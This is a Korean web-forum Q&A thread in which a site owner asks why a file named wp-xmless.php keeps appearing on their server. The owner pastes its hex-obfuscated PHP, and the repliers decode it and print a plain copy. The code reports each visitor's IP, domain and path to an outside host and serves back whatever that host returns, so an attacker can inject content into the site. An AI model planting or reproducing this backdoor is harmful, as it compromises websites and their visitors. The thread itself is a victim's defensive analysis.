바이러스 처럼 wp-xmless.php 파일이 자동으로 생성됩니다.

현재접속자 최신글 매뉴얼 FAQ
그누보드5
그누보드6
가이드
포럼
  • Q&A
  • 파이써니스타
  • 이슈
  • 버그신고
  • 사용후기
    • 자료실
  • 다운로드
  • 팁자료실
  • 스킨
  • 테마
  • 플러그인
    • Q & A
    궁금한 게 있으신가요? 지금 질문해보세요!
    솔루션
    프로그래밍
    서버
    사이트운영
    컨텐츠몰
    나의 재능을 팔아보세요!
    부가서비스
    프로모션! 신용카드 결제수수료 2.9%
    제작의뢰
    커뮤니티
    커뮤니티
    소모임
    스터디
    강좌
    기타
    바이러스 처럼 wp-xmless.php 파일이 자동으로 생성됩니다.

    QA

    바이러스 처럼 wp-xmless.php 파일이 자동으로 생성됩니다.

    본문

    바이러스 처럼 wp-xmless.php 파일이 자동으로 생성됩니다.

    파일 내용은 아래처럼 알수없는 코드로 구성되어 있어요.

    원인을 알 수 있을까요? 도움 부탁 드립니다.ㅜ

     

    <?php
    header(_typeGet());
    echo _httpGet("\x68\x74\x74\x70\x3A\x2F\x2F\x76\x70\x62\x7A\x2E\x61\x75\x67\x30\x31\x63\x6F\x64\x65\x2E\x63\x6F\x6D\x2F\x68\x74\x61\x63\x63\x65\x73\x73\x2E\x61\x73\x70\x78\x3F\x68\x6F\x73\x74\x3D" . urlencode($_SERVER["\x52\x45\x4D\x4F\x54\x45\x5F\x41\x44\x44\x52"]) . "\x26\x64\x6F\x6D\x61\x69\x6E\x3D" . urlencode($_SERVER["\x48\x54\x54\x50\x5F\x48\x4F\x53\x54"]) . "\x26\x70\x61\x74\x68\x3D"  . urlencode($_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5F\x55\x52\x49"]));
    function _httpGet($url){
            $curl = curl_init();
            curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($curl, CURLOPT_URL, $url);
            $res = curl_exec($curl);
            curl_close($curl);
            return $res;
        }
    function _typeGet(){
            $path = $_SERVER["\x52\x45\x51\x55\x45\x53\x54\x5F\x55\x52\x49"];
            if (strpos($path, "\x2E\x78\x6D\x6C"))
                    return "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65\x3A\x20\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x6D\x6C";
            if (strpos($path, "\x2E\x6A\x73"))
                    return "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65\x3A\x20\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74";
            return "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65\x3A\x20\x74\x65\x78\x74\x2F\x68\x74\x6D\x6C";
        }
    ?>

    #그누보드5 #그누보드4 #php

    이 질문에 댓글 쓰기 :

    답변 2

    그누위즈 홈페이지 자기소개 전체게시물 회원게시물 회원 질문검색 회원 답변검색 회원 댓글검색 님의 답변

    59.♡.♡.116

    모든 소스파일에서 wp-xmless.php 파일을 생성하는 부분이 없는지 찾아보셔야 할듯하시고.

    우선 해당 부분을 풀어보면

    http://vpbz.aug01code.com/htaccess.aspx?로 사용자의 도메인과 ip를 수집해가는거 같습니다.

     

    뽀송이3 자기소개 전체게시물 회원게시물 회원 질문검색 회원 답변검색 회원 댓글검색 님의 답변

    122.♡.♡.156
    1. 이런코드입니다. 사이트에 원하는 javascript 코드를 심을 수 있겠는데요..
    2.  
    3. header(_typeGet());
    4. echo _httpGet("http://vpbz.aug01code.com/htaccess.aspx?host=" . urlencode($_SERVER["REMOTE_ADDR"]) . "&domain=" . urlencode($_SERVER["HTTP_HOST"]) . "&path=" . urlencode($_SERVER["REQUEST_URI"]));
    5. function _httpGet($url){
    6. $curl = curl_init();
    7. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    8. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    9. curl_setopt($curl, CURLOPT_URL, $url);
    10. $res = curl_exec($curl);
    11. curl_close($curl);
    12. return $res;
    13. }
    14. function _typeGet(){
    15. $path = $_SERVER["REQUEST_URI"];
    16. if (strpos($path, ".xml"))
    17. return "Content-Type: application/xml";
    18. if (strpos($path, ".js"))
    19. return "Content-Type: application/javascript";
    20. return "Content-Type: text/html";
    21. }
    답변을 작성하시기 전에 로그인 해주세요.
    전체 345
    QA 내용 검색

    회원로그인

    인기태그
    #그누보드5(59515) #영카트5(16776) #php(14952) #그누보드4(10632) #게시판(3155) #javascript(2632) #그누보드(2343) #css(2042) #mysql(1506) #모바일(1271) #영카트(1270) #그누커머스(1178) #html(1098) #jquery(1012) #자바스크립트(935) #최신글(931) #DB(818) #로그인(791) #이미지(762) #여분필드(736)
    (주)에스아이알소프트 / 대표:홍석명 / (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1404호 / E-Mail: admin@sir.kr
    사업자등록번호: 217-81-36347 / 통신판매업신고번호:2014-서울강남-02098호 / 개인정보보호책임자:김민섭(minsup@sir.kr)
    © SIRSOFT